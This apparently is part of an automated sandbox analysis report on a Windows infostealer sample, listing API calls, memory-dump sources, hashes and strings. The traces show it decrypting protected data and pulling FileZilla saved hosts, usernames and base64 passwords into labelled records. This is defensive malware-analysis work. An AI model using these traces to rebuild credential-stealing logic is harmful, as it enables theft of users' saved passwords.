                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                              • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                              • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                              • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,022E53EB,40000001,00000000,00000000,?,022E53EB), ref: 022F9127
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                              • Instruction ID: 2550f52006e8f2b83976578b9a03c54a2d1ad19c17d673727e77d486c509de24
                              • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                              • Instruction Fuzzy Hash: 5B111F74214205BFDB40CF94DC98FA773AAAF89740F009578FA098B264D775E881DB60
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022E5155,00000000,00000000), ref: 022E9D56
                              • LocalAlloc.KERNEL32(00000040,?,?,?,022E5155,00000000,?), ref: 022E9D68
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022E5155,00000000,00000000), ref: 022E9D91
                              • LocalFree.KERNEL32(?,?,?,?,022E5155,00000000,?), ref: 022E9DA6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                              • Instruction ID: 963b71b57383a2556b51831be05b983c99cd137e100eaf3de134f3754485e773
                              • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                              • Instruction Fuzzy Hash: 1711A4B4240208BFEB10CFA4CC95FAA77B5EB89704F208059FD159B394C776A941CB90
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                              • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                              • LocalFree.KERNEL32(?), ref: 00409BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                              • String ID:
                              • API String ID: 3243516280-0
                              • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                              • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                              • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                              • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 022E9DEB
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 022E9E0A
                              • memcpy.MSVCRT(?,?,?), ref: 022E9E2D
                              • LocalFree.KERNEL32(?), ref: 022E9E3A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                              • String ID:
                              • API String ID: 3243516280-0
                              • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                              • Instruction ID: f48408bfef89aa8dd0a135fe1a204d7657bd1f91c845ba2acd1cfad65f451b00
                              • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                              • Instruction Fuzzy Hash: 021109B8A00209EFDB04DFA8D985AAEB7B9FF89304F104559F915A7350D730AE50CFA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0073F608,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                              • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,0073F608,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0073F608,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                              • wsprintfA.USER32 ref: 00417AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 362916592-0
                              • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                              • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                              • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                              • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                              APIs
                              • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                              • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                              • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                              • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: .$GetProcAddress.$l
                              • API String ID: 0-2784972518
                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                              • Instruction ID: 729509d9cad45209f4adc6cfc72b6d5237bdc4143424d61a88d679ce3ad6bd9c
                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                              • Instruction Fuzzy Hash: B43169B6910609CFDB20CF99C880AAEBBF5FF18724F54404AD442B7314D7B1EA45CBA4
                              APIs
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 022EF985
                              • StrCmpCA.SHLWAPI(?,004215BC), ref: 022EF9D6
                              • StrCmpCA.SHLWAPI(?,004215C0), ref: 022EF9EC
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 022EFD18
                              • FindClose.KERNEL32(000000FF), ref: 022EFD2A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: dbc33d9263c12bccf2023e6a26364f15308e1a9a0f3d34f169b2ef739c1ce31c
                              • Instruction ID: 5ffafe99b1c26a64b92a10fdfac79120001bddd4b96ffc411f997a5b06042896
                              • Opcode Fuzzy Hash: dbc33d9263c12bccf2023e6a26364f15308e1a9a0f3d34f169b2ef739c1ce31c
                              • Instruction Fuzzy Hash: B311B43182030CABCB68EBE0DD649EDB336AF20300F4042BA960E56195EF341B49CF41
                              APIs
                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001CEA8), ref: 0041CEEF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                              • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                              • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                              • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                              APIs
                              • SetUnhandledExceptionFilter.KERNEL32(0041CEA8), ref: 022FD156
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                              • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                              • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                              • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255028758.0000000000711000.00000040.00000020.00020000.00000000.sdmp, Offset: 00711000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_711000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: K+q
                              • API String ID: 0-3539732464
                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                              • Instruction ID: b19e550a4bbfc02660311a012461f3369f18c1194535719c813b1bfc23a57f69
                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                              • Instruction Fuzzy Hash: BB118272340100AFD754DF59DC81FE673EAEB88320B298065ED04CB356E679EC52C760
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                              • Instruction ID: bf5abefc6b6423cf7346c2d27ca77ede209e7abe5332df108e0fd2707080945d
                              • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                              • Instruction Fuzzy Hash: 7001AC766205058FDF21DF64C804FAE33E9EB86315F8944B5E907E7245D7B4A6428F90
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                              • Instruction ID: 4469cbce40bc13bee26ef3afcc501b4ee9c0e37d309943ca325b37e2282ed316
                              • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                              • Instruction Fuzzy Hash: 9471C132471B40DBD7E63BB1DF01E4AFAA37F04702F104934BADF295749E2268659E51
                              APIs
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                              • strtok_s.MSVCRT ref: 0041031B
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                              • lstrlenA.KERNEL32(00000000), ref: 00410393
                                • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                              • lstrlenA.KERNEL32(00000000), ref: 004103DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                              • lstrlenA.KERNEL32(00000000), ref: 00410427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                              • lstrlenA.KERNEL32(00000000), ref: 00410475
                              • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                              • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                              • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                              • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                              • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                              • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                              • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                              • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                              • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                              • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                              • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                              • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                              • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                              • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                              • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                              • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                              • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                              • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                              • strtok_s.MSVCRT ref: 00410679
                              • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                              • memset.MSVCRT ref: 004106DD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 337689325-514892060
                              • Opcode ID: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                              • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                              • Opcode Fuzzy Hash: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                              • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                              APIs
                              • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 022F9B08
                              • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 022F9B21
                              • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 022F9B39
                              • GetProcAddress.KERNEL32(0064A8B0,q), ref: 022F9B51
                              • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 022F9B6A
                              • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 022F9B82
                              • GetProcAddress.KERNEL32(0064A8B0,ap), ref: 022F9B9A
                              • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 022F9BB3
                              • GetProcAddress.KERNEL32(0064A8B0,q), ref: 022F9BCB
                              • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 022F9BE3
                              • GetProcAddress.KERNEL32(0064A8B0,(q), ref: 022F9BFC
                              • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 022F9C14
                              • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 022F9C2C
                              • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 022F9C45
                              • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 022F9C5D
                              • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 022F9C75
                              • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 022F9C8E
                              • GetProcAddress.KERNEL32(0064A8B0,@q), ref: 022F9CA6
                              • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 022F9CBE
                              • GetProcAddress.KERNEL32(0064A8B0,pq), ref: 022F9CD7
                              • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 022F9CEF
                              • LoadLibraryA.KERNEL32(Xq,?,022F6C67), ref: 022F9D01
                              • LoadLibraryA.KERNEL32(0064A17C,?,022F6C67), ref: 022F9D12
                              • LoadLibraryA.KERNEL32(0064A104,?,022F6C67), ref: 022F9D24
                              • LoadLibraryA.KERNEL32(0064A1DC,?,022F6C67), ref: 022F9D36
                              • LoadLibraryA.KERNEL32(pq,?,022F6C67), ref: 022F9D47
                              • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 022F9D69
                              • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 022F9D8A
                              • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 022F9DA2
                              • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 022F9DC4
                              • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 022F9DE5
                              • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 022F9E06
                              • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 022F9E1D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: (q$@q$Xq$pq$pq$q$q$ap
                              • API String ID: 2238633743-2066060892
                              • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                              • Instruction ID: 47f074e770f5ec293270bee9bdab4cb5247edc57f0da5f447481bbcba2c624c4
                              • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                              • Instruction Fuzzy Hash: 3BA13CBE5D0240BFE364EFE8ED88A963BFBF74E201714661AE605C3264D7399441DB12
                              APIs
                              • lstrlen.KERNEL32(00424DA0), ref: 022E4833
                              • lstrlen.KERNEL32(00424E50), ref: 022E483E
                              • lstrlen.KERNEL32(00424F18), ref: 022E4849
                              • lstrlen.KERNEL32(00424FD0), ref: 022E4854
                              • lstrlen.KERNEL32(00425078), ref: 022E485F
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 022E486E
                              • RtlAllocateHeap.NTDLL(00000000), ref: 022E4875
